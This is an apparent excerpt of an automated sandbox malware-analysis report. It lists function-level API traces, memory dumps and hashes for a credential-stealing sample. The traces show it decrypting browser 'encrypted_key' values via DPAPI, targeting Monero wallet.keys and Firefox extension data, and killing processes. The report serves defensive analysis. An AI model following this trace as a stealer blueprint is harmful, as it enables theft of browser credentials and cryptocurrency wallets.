                                • Part of subcall function 006499C0: CloseHandle.KERNEL32(000000FF), ref: 00649A9A
                                • Part of subcall function 00658E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00658E52
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00661580,00660D92), ref: 0064F54C
                              • lstrlen.KERNEL32(00000000), ref: 0064F56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 524f63bd0376e8849fd06cdfdc254b1ce60844a3cd6adb551da01e9ce47ba4f9
                              • Instruction ID: 90e46cfe50944dbe7d0918a584e2268765ad250d024e668e048f4288a8ba84eb
                              • Opcode Fuzzy Hash: 524f63bd0376e8849fd06cdfdc254b1ce60844a3cd6adb551da01e9ce47ba4f9
                              • Instruction Fuzzy Hash: C9511F75D10108AADB44FBE4DC96DED773AAF54301F40862CFC16A7191EE346A0DCBAA
                              Function 00653560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: d35c8bfe29d53bee746f99d374738f250137410f307c8874b698ab5e10d9fba2
                              • Instruction ID: 4faa64ad5f5251e21bfb4abaf7340e42f40be851dab32a07711f83ef8b8c8e6f
                              • Opcode Fuzzy Hash: d35c8bfe29d53bee746f99d374738f250137410f307c8874b698ab5e10d9fba2
                              • Instruction Fuzzy Hash: 9A415F75D10109ABDB04EFE4C845AEEB776BF54705F00852CE81277390EB75AA09CFA6
                              Function 00649CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 006499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006499EC
                                • Part of subcall function 006499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00649A11
                                • Part of subcall function 006499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00649A31
                                • Part of subcall function 006499C0: ReadFile.KERNEL32(000000FF,?,00000000,0064148F,00000000), ref: 00649A5A
                                • Part of subcall function 006499C0: LocalFree.KERNEL32(0064148F), ref: 00649A90
                                • Part of subcall function 006499C0: CloseHandle.KERNEL32(000000FF), ref: 00649A9A
                                • Part of subcall function 00658E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00658E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00649D39
                                • Part of subcall function 00649AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nd,00000000,00000000), ref: 00649AEF
                                • Part of subcall function 00649AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00644EEE,00000000,?), ref: 00649B01
                                • Part of subcall function 00649AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nd,00000000,00000000), ref: 00649B2A
                                • Part of subcall function 00649AC0: LocalFree.KERNEL32(?,?,?,?,00644EEE,00000000,?), ref: 00649B3F
                                • Part of subcall function 00649B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00649B84
                                • Part of subcall function 00649B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00649BA3
                                • Part of subcall function 00649B60: LocalFree.KERNEL32(?), ref: 00649BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 2ca02b60acaf4ace2cb6d123189d5d56e810a7eb2ee33ee50c3d9c32013f723b
                              • Instruction ID: 3409033ae2e2447439a4d4f9563dad617f00378e4858d9634b2e697b5133e510
                              • Opcode Fuzzy Hash: 2ca02b60acaf4ace2cb6d123189d5d56e810a7eb2ee33ee50c3d9c32013f723b
                              • Instruction Fuzzy Hash: 1E315EB6D10609ABCF04DFE4DC86AEFB7BABF48304F144519E905A7241EB349A44CBB5
                              Function 006594D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 006594EB
                                • Part of subcall function 00658D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0065951E,00000000), ref: 00658D5B
                                • Part of subcall function 00658D50: RtlAllocateHeap.NTDLL(00000000), ref: 00658D62
                                • Part of subcall function 00658D50: wsprintfW.USER32 ref: 00658D78
                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 006595AB
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 006595C9
                              • CloseHandle.KERNEL32(00000000), ref: 006595D6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                              • String ID:
                              • API String ID: 3729781310-0
                              • Opcode ID: be720c151800ce2ed9ac5fa7ca80bec26a093bb2bbcff8c44acc094476c1e8bc
                              • Instruction ID: 7887be2a0c40b21a439fa7e5b91690f29a38345d01527ca4acb62c19add3e481
                              • Opcode Fuzzy Hash: be720c151800ce2ed9ac5fa7ca80bec26a093bb2bbcff8c44acc094476c1e8bc
                              • Instruction Fuzzy Hash: D5311C71A00308DFEB14DBD4CD49BEDB7B9FB44701F204559E906AB284EB74AA89CB51
                              Function 00658680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006605B7), ref: 006586CA
                              • Process32First.KERNEL32(?,00000128), ref: 006586DE
                              • Process32Next.KERNEL32(?,00000128), ref: 006586F3
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • CloseHandle.KERNEL32(?), ref: 00658761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 80bc9affa4ab0d26ccda00e5837680c213364c199c33e92fe01e1c4975656f82
                              • Instruction ID: aef0261570677b7e477eb31a5677b9ddd0057d29b979fb02d4c3a8f0ca5cad6d
                              • Opcode Fuzzy Hash: 80bc9affa4ab0d26ccda00e5837680c213364c199c33e92fe01e1c4975656f82
                              • Instruction Fuzzy Hash: 18314F71901218ABDB64DF94DC45FEEB779FB49701F1042ADE90AA2190DB306A49CFA1
                              Function 00657980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00660E00,00000000,?), ref: 006579B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 006579B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00660E00,00000000,?), ref: 006579C4
                              • wsprintfA.USER32 ref: 006579F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: d8c2c5701c12c39a31a036859f1c73709573d355536ce05d20846d341cba0bd7
                              • Instruction ID: c33cb7d611448d38a5c3d54ffef11a36b9693e59de555aa027b6ccef1c006125
                              • Opcode Fuzzy Hash: d8c2c5701c12c39a31a036859f1c73709573d355536ce05d20846d341cba0bd7
                              • Instruction Fuzzy Hash: BD110CB2904118ABDB14DFD9DD45BBEB7F8FB4CB11F10415AF605A2280E7795940C7B1
                              Function 0065C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 0065C74E
                                • Part of subcall function 0065BF9F: __amsg_exit.LIBCMT ref: 0065BFAF
                              • __getptd.LIBCMT ref: 0065C765
                              • __amsg_exit.LIBCMT ref: 0065C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0065C797
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: ef193fcbf220add0cf5db42bb4181cad99b7fd1452735e9f37057dd2c457574c
                              • Instruction ID: 3cfa2121956af4d5da0f185c5cb79e45d5b0fbbf4fb101b450d37f3e96375746
                              • Opcode Fuzzy Hash: ef193fcbf220add0cf5db42bb4181cad99b7fd1452735e9f37057dd2c457574c
                              • Instruction Fuzzy Hash: C2F090329007109FD7A0BFB85806B8D33A3AF04737F24514DFC14A66D2CB6459899E5E
                              Function 00654F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00658DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00658E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00654F7A
                              • lstrcat.KERNEL32(?,00661070), ref: 00654F97
                              • lstrcat.KERNEL32(?,013D8888), ref: 00654FAB
                              • lstrcat.KERNEL32(?,00661074), ref: 00654FBD
                                • Part of subcall function 00654910: wsprintfA.USER32 ref: 0065492C
                                • Part of subcall function 00654910: FindFirstFileA.KERNEL32(?,?), ref: 00654943
                                • Part of subcall function 00654910: StrCmpCA.SHLWAPI(?,00660FDC), ref: 00654971
                                • Part of subcall function 00654910: StrCmpCA.SHLWAPI(?,00660FE0), ref: 00654987
                                • Part of subcall function 00654910: FindNextFileA.KERNEL32(000000FF,?), ref: 00654B7D
                                • Part of subcall function 00654910: FindClose.KERNEL32(000000FF), ref: 00654B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: da0b59d92c5f86fe3113c5883c15e401d3c086363b5f4d9213228e4d5a53edac
                              • Instruction ID: 2f05edc164e7906ea8a972d8858d60d61fabf2d334cc722c0e58f1c923783ceb
                              • Opcode Fuzzy Hash: da0b59d92c5f86fe3113c5883c15e401d3c086363b5f4d9213228e4d5a53edac
                              • Instruction Fuzzy Hash: F921CBB69002046BD798FBB4DC46EE9333DBB54300F004559B649971C1EE7496CC8BA6